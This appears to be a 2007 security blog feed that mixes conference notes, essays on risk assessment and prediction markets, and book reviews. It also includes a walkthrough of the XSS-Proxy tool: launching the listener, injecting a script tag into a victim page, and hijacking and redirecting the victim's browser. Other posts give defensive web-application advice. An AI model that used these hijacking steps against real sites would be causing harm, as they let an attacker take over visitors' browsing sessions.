Elder mentioned some of the tasks the Air Force expects to perform to better secure its networks. These included a "cyber standardization and evaluation team," application assurance testing, software tamper detection via signatures and hashes, clusters of systems voting on proper outcomes, "cyber sidearms" in the form of tools on individual laptops, and a specific cyber Air Force Specialty Code (AFSC). If this had happened 10 years ago my career would have been very different and probably much longer!

Elder finished his talk describing how the US Code affects Air Force activities. For example, Title 10 (Armed Forces) restricts the work of the active duty military. Similar restrictions affect the intelligence community through Title 50 (War and Defense). However, because the Air National Guard operates under Title 32 (National Guard), it has more room to help the commercial sector and local governments with network defense. Elder said he would like to see Guard cyber units in every state, from the size of a squadron up to a wing. I thought this was a fairly exciting concept, since the Guard is likely to contain people with industry experience.

Lt. Gen. Baker and Gen. Jumper only spoke for a few minutes each. Jumper really hammered the acquisition community for providing the "block 40 upgrade to the block 30 capability" and thinking that helps the warfighter. He recommended writing Concepts of Operations before deciding what to buy. (Wow, sounds just like the commercial world; don't let vendors drive your security program!) Jumper said we need a "PhD-quality Weapons School," aggressor forces, and policy and doctrine modeled on offensive and defensive counter-air operations.

In the question phase, when asked why the bad guys are "so much better" than the good guys, Jumper replied "Bad guys don't have policy constraints." I believe Baker stated that the biggest problem he sees in industry is the feeling that "we don't think it [breaches] can happen to us,", he said, "but it's happening every day."

As far as the report itself, I realized the author did not have any experience in the topic of computer network defense, exploitation, or warfare. Having just watched two shows on Army and Marine snipers, it made me think how it must sound to a sniper for a non-sniper to write a report on sniper craft. Disappointingly, the Estonia "cyberwar" was presented as the galvanizing action that should stir everyone's pot. In describing the event, the report author wrote:

The attackers also used illicitly linked computers around the globe to mount an enhanced onslaught. These attacks were conducted by networks of "bots" -- a bot being an automated program that accesses web sites and traverses the site by following links on its pages.

So, it appears we should pin the blame on Web crawlers. Sigh.

I also read about "Windows 1.0" being released in August 1995 and "Windows 2.0" in November 1995.

Apparently no one did a technical edit of this report. It's clear it took a lot of work to write this report, however. There's plenty of history, references and interviews. I would not have wanted to undertake this task, since I would have required a few years to get the history right.

I found this one item immensely interesting, so I'll close with it:

[One] difficulty is estimating the scope of the mission. "We are well past the $5 billion per year mark, and I don't know where the top end is," commented one STRATCOM official. "The $5 billion is mostly on defense. We buy huge amounts of software and people to run that, but it's totally ineffective against Tier III" cyber [advanced persistent] threats, this official noted. (emphasis added)

Kamis, 11 Oktober 2007

XSS-Proxy PoC

The other day, i was thinking about how can i actually get more sales during a meeting session with customers and with the current bloom of hacking websites, i thought its time to actually show customers of what i can do and the impact of a XSS vulnerability. I referred to the book "XSS Exploit and Defence" by Jeremiah and Rsnake and i decided to go with a tool called the XSS-Proxy. All i can say is this tool is really light and easy to use. All you need is just perl and a webserver to be running on your machine and one would have to just launch the listener from there on with the command "perl XSS-Proxy-shmoo_0_0_11" in the command prompt. Anton Rager actually spend some time with me explaining to me how this tool works and the impact of an XSS. I would like to thank him here for his time and effort. If those of you guys who would love to try this tool, download it at http://xss-proxy.sourceforge.net. There is also Advanced XSS attacks and a mini whitepaper for further knowledge reading.

First to startup xss-proxy:


Then inject a script tag into the victim page, be it persistent or reflected, try it to realised it.


The admin page contains the links that the victim had visited, and by clicking those links, you can choose to redirect and hijack the victim browser under the same document domain


A sample of the redirect attack. Observe the below grey bar with "Opening page.."
This is achieved through by clicking on the admin page on one of the links the victim had visited and i wanted the victim to visit another page, so i choose the link i wanted the victim to visit and click on it. On the victim side, he will automatically be redirected to the page i chosed.


And finally, i can even proxy javascript injection on the victim browser. A simple one would be alert('XSS');


The Hacka Man

Rabu, 10 Oktober 2007

Alternatives to "Expert Opinions"

If you read The Doomsday Clock you probably recognize I have a dim opinion of "expert opinion," especially by committee. At the risk of making a political statement, I rank expert opinion alongside central planning as some of the worst ways to make decisions -- at least where a large amount of complexity must be accommodated.

What is my alternative? I believe free markets are the best way to synthesize competing data points to produce an assessment. Does this sound familiar? If yes, you may be thinking of this 2003 story: The Case for Terrorism Futures:

Critics blasted policy-makers Tuesday for dropping a controversial plan to create a futures market to help predict terrorist strikes...

[S]upporters of the project point out that gathering intelligence is often a messy business, with payoffs to unsavory characters and the elimination of potential adversaries. The futures market, ugly as it may sound, doesn't involve any of those moral compromises, said Robin Hanson, one of the earlier promoters of the concept of trading floors for ideas and a PAM [Policy Analysis Market] project contributor. It's just a way of capturing people's collective wisdom...

Projects similar to PAM, like the Iowa Electronic Markets, which speculate on election results, have been surprisingly reliable indicators of what's going to happen next...

The price of orange juice futures has even been shown to accurately predict the weather...

Traders on the Hollywood Stock Exchange last year correctly picked 35 of the 40 Oscar nominees in the eight biggest categories, according to The New Yorker magazine...

Market mechanisms are more accurate than asking people their opinions because they're putting their money or reputation on the line," said Ken Killitz of the Foresight Exchange, which speculates on everything from the future of human cloning to the possibility that Roman Catholic priests will be allowed to marry. "It gives people an incentive to reveal what they know..."

[E]xchanges "tend to predict events really well when no one person knows the answer -- when information is distributed among many people with different knowledge bases," said Joyce Berg, a University of Iowa professor who helped organize the political trading floors...

Markets also bring together people with information about a particular subject in a way blue-ribbon panels of experts can't, added Hanson.

"You get people that know things about a subject, but don't have the credentials to say so," he said. "You get people who live in these areas (of the Middle East)."

There's also "less of an ability to spin" in markets than in policy debates, Hanson noted. "So you get what people actually think, not what they say."


I love this idea. The fact that intellectual pygmies in the Senate defeated it is a real shame.

I found many interesting articles on this subject by Robin D. Hanson from George Mason University and Oxford's Future of Humanity Institute; the latter offers a Global Catastrophic Risks program that is probably more interesting (but less marketing-savvy) than the Doomsday Clock.

If you're sufficiently motivated to start arguing against this idea, I will probably just point back into the literature (especially Hanson's) countering these complaints.

If you're wondering why I mention this at all, it ties into my mention of security breach derivatives in my post Excerpts from Ross Anderson / Tyler Moore Paper.

The Doomsday Clock

Tonight I finished watching a show called The Doomsday Clock, on the best TV channel (the History Channel, of course). I was vaguely aware of the clock, maintained by the Bulletin of the Atomic Scientists, but I didn't know the history of the project. According to Minutes to Midnight:
The Bulletin of the Atomic Scientists’ Doomsday Clock conveys how close humanity is to catastrophic destruction--the figurative midnight--and monitors the means humankind could use to obliterate itself. First and foremost, these include nuclear weapons, but they also encompass climate-changing technologies and new developments in the life sciences and nanotechnology that could inflict irrevocable harm.

Interesting -- you know what this is? It's a risk assessment. In my first book I defined risk as the probability of suffering harm or loss. The Doomsday Clock supposedly displays how close we are to world-ending catastrophe.

I find two aspects of the clock appealing.



First, as depicted by Information Aesthetics, the clock rapidly and clearly communicates its message. If you see fewer and fewer minutes until midnight, you sense something bad is about to happen. It's language-neutral and concise.



Second, the act of moving the hands and then tracking hand position over time provides a sense of risk trending. As depicted by Wikipedia above, you can get a historical reading of risk by watching the number of minutes to midnight rise and fall. The interval between the hand position changes is also significant.

The problem with the Doomsday Clock is the same problem found in many, if not most, risk assessments. It is more or less arbitrary. The creation of the clock and the initial position of its hands was completely arbitrary, in fact! The designer of the clock, artistic designer Martyl Langsdorf, invented the clock for the June 1947 issue of the Bulletin. She positioned the hands to be aesthetically pleasing, not to show how close we were to destruction. When you consider the amount of time she could have worked with (12 hours), limiting herself to a fifteen minute window set a precedent for the next sixty years. While the clock has moved outside this 15 minute window (for example, in 1991) the precedent was set too narrowly. What will the bulletin do when even greater threats exist -- move to second and then nano-second increments?

In response to the Soviet's 1949 detonation of their first atomic weapon, Bulletin founder and editor Eugene Rabinowitch told Langsdorf to move the hands from 7 minutes to midnight to 3 minutes to midnight. Again, this choice was basically to convey urgency. Only when the hands were moved on the magazine cover did readers start to appreciate the information conveyed by the clock.

From this point forward, the hands have moved back and forth as the Bulletin members and, more recently, outside parties have haggled about the position of the hands. I have a feeling these meetings would drive me crazy. It's a collection of people with opinions arguing about the location of hands on a clock created originally for artistic value. Still, as noted in my two "appealing" points, I think we can learn some lessons from the Doomsday Clock regarding the ability to quickly and powerfully communicate risk to others.

While researching this post I discovered that the ACLU jumped on the "clock bandwagon" with its Surveillance Society Clock. According to the ACLU, "It's six minutes before midnight as a surveillance society draws near within the United States." This is dumb for multiple reasons.

First, the ACLU chose a digital clock. I don't know about you, but for me a digital clock doesn't convey an amount of time as visually as an analog clock. It's like a speedometer; seeing it pegged to the right is more powerful than reading "101 MPH" or similar. Second, as Wired magazine astutely asked how do we know when we're there? It's tough to ignore Armageddon; it's easy to ignore a "surveillance state." Third, the ACLU painted itself into the same corner as the Bulletin did when it chose to set its initial time so close to midnight. What's the ACLU going to do with the clock when remote mind-reading is in use?

Be the Caveman Lawyer

A few weeks ago I recommended security people to at least Be the Caveman and perform basic adversary simulation / red teaming. Now I read Australia's top enterprises hit by laymen hackers in less than 24 hours:

A penetration test of 200 of Australia's largest enterprises has found severe network security flaws in 79 percent of those surveyed.

The tests, undertaken by University of Technology Sydney (UTS), saw 25 non-IT students breach security infrastructure and gain root or administration level access within the networks of Australia's largest companies, using hacking tools freely available on the Internet.

The students - predominately law practitioners - were given 24 hours to breach security infrastructure on each site and were able to access customer financial details, including confidential insurance information, on multiple occasions.

High-level business executives from the companies surveyed, rather than IT staff, were informed of the tests so the "day-to-day network security" of businesses could be tested.
(emphasis added)

Again, my advice is simple, but now it is modified. Be the Caveman Lawyer.

One other point from the article:

Most of the 21 percent of companies who passed the penetration tests owed their success to freeware Intrusion Detection Systems (IDSs), according to Ghosh.

Snort was mentioned earlier in the article. That means you can be a Cheap Caveman Lawyer and prepare for common threats.

Selasa, 09 Oktober 2007

AppCodeScan beta Released

Few minutes ago, Shreeraj just updated me with the release of a new tool from Blueinfy. This tool basically check your source code for potential entry points for xss, sql injection, poor validation etc. Well, personally i had not tested the tool due to time constraints and my busy schedule. I would strongly recommend anyone who has the time to actually download the tool and give it a try and its free anyway. The tool is called AppCodeScan and for those who had already tried the tool, feel free to let me know as trust me, i am really eager to try on this. Also, check out Fortify's source code scanning tool which has similar functions and usage. The only difference is maybe the support and its an enterprise tool. At the same time, do check out their cost and you know why Shreeraj is so generous to make it free. Of course, you can customize the ruleset to suit your application if you know how to. Thank you Shreeraj.

http://blueinfy.com/tools.html

The Hacka Man

Senin, 08 Oktober 2007

Try this at your own risk, COKE Machine hacked!!

I was checking PDP's hack on citrix and i stumble across a coke machine hack. Well, i am not sure if this is an old exploit or if it is still working as of today or it is patched. However, i could not replicate this hack on a vending machine here. Maybe it is of a different model or different system or different chipset. Whatever it is, this is a cool one. Simple yet effective.



The Hacka Man

Minggu, 07 Oktober 2007

One Review and One Prereview

Amazon.com just published my five star review of Security Data Visualization by Greg Conti. From the review:

Security Data Visualization (SDV) is a great book. It's perfect for readers familiar with security who are looking to add new weapons to their defensive arsenals. Even offensive players will find something to like in SDV. The book is essentially an introduction to the field, but it is well-written, organized, and clear. I recommend all security analysts read SDV.

I give five star reviews to books that meet certain criteria. First, the book should change the way I look at a problem, or properly introduce me to thinking about a problem for which I have little or no frame of reference. Although I have been a security analyst for ten years, I have little visualization experience. Author Greg Conti spent just the right amount of time explaining the field, describing key terms (preattentive processing, occlusion, brushing) and displays (star plots, small multiples, TreeMaps). I loved the author's mention of Ben Shneiderman's visualization mantra: "overview first, zoom and filter, details on demand" (p 14).


I'd like to mention another great No Starch book called Linux Firewalls by my friend Mike Rash. Mike was kind enough to ask me to write the foreword. If you look at my quote on the front cover (click on the image) you might think "Wow, Bejtlich is creative." Here's the context for that quote, from the foreword:

I'd like to conclude these thoughts by speaking as a book reviewer and author. Between 2000 and mid-2007 I've read and reviewed nearly 250 technical books. I've also written several books, so I believe I can recognize a great book when I see it. "Linux Firewalls" is a great book. As a FreeBSD user, "Linux Firewalls" is good enough to make me consider using Linux in certain circumstances!

No Starch has several more great books on the way, including Absolute FreeBSD, 2nd Ed (on FreeBSD 7.x) and several others.

Just another XSS

Well, i am getting tired of your site "big organization". PoC shown with screenshots of your site being XSS numerous times. Just patch up quick and you will be alright. Hire me or get someone to do the job. What ever you decide, wish you good luck and all the best.



The Hacka Man

Sabtu, 06 Oktober 2007

Intruders Continue to Be Unpredictable

One of my three basic security principles is advanced intruders are unpredictable. Believing you can predict what intruders are going to do next results in soccer-goal security. As I said in Pescatore on Security Trends, advanced attackers are digital innovators. I think I will start calling advanced intruders intrupreneurs.

I just read and watched great examples of this principle in action courtesy of pdp at CITRIX: Owning the Legitimate Backdoor. I recommend reading the post and watching the two videos. If you are practicing Network Security Monitoring I recommend querying your session data for all incoming Citrix traffic, for as far back as you have stored, for unusual or unexpected activity. If you are not practicing NSM already I suggest beginning emergency NSM to watch your Citrix servers.

It's important to realize that you may not even know you have certain Citrix servers active on your network. The flip side of the intruders are unpredictable principle is that your network is probably unpredictable too! In other words, you could be happy thinking "we have no Citrix servers," but after looking via NSM you find you do. It's probable a bad guy found them before you did, but courtesy of NSM you have data about what happened. More often than not, that's the best you can do with your time and resources.

Jumat, 05 Oktober 2007

Preventation is better than Cure

With over 6 years of experience in penetration tests of all sorts of systems from networks to web applications to databases to many others more, I can say that i have successfully achieve my goals as "hacker" or a white hat. As usual, i am constantly keeping myself abreast of the lastest exploits and hacking methodology. I am not really a true researcher, but however a guy who loves to read all sorts hacking books or articles.

Well, with the recent work i am doing on web applications, i can say that most web applications are truly not secure and hackable, except for a few out there. It all boils down to the developers and the customers. Those customers have no idea of how secure programming is so important. Once they are hacked, their reputation is gone and data is lost. From what i see, customers are always eager to launch their application online maybe because of certain time frame they have to meet or maybe because they are eager to let the consumers know more about their services and products, but they did not think about security on their applications as a whole. Well, i would advise them to think twice and think about the possibility of being hacked hard time. Below are a few guidelines that i got from Jeremiah's whitepaper that after reading it, i feel that it is important to embrace it, rather than treating it just like another whitepaper.

Secure Code: Application developers must consider security
from the beginning. Involve the security staff early in the
process.

QA Development: Experienced staff must perform periodic
security as well as usability reviews.

Stay up-to-date on patches and configured securely.

Continuous assessments: Covering both technical and logical
issues on the production web site as its being changed.

Also, for those who are paranoid about your web applications and have no budgets to spent, you guys should install an Web Application Firewall like ModSecurity to shield off most of the attacks and moreover, it is customizable where you can add your own ruleset. There are also a few open source WAF like PHP-IDS for XSS, URLSCAN for IIS and some others. Commercial ones are available too. It all depends on how much you can spend and what do you really need.

The Hacka Man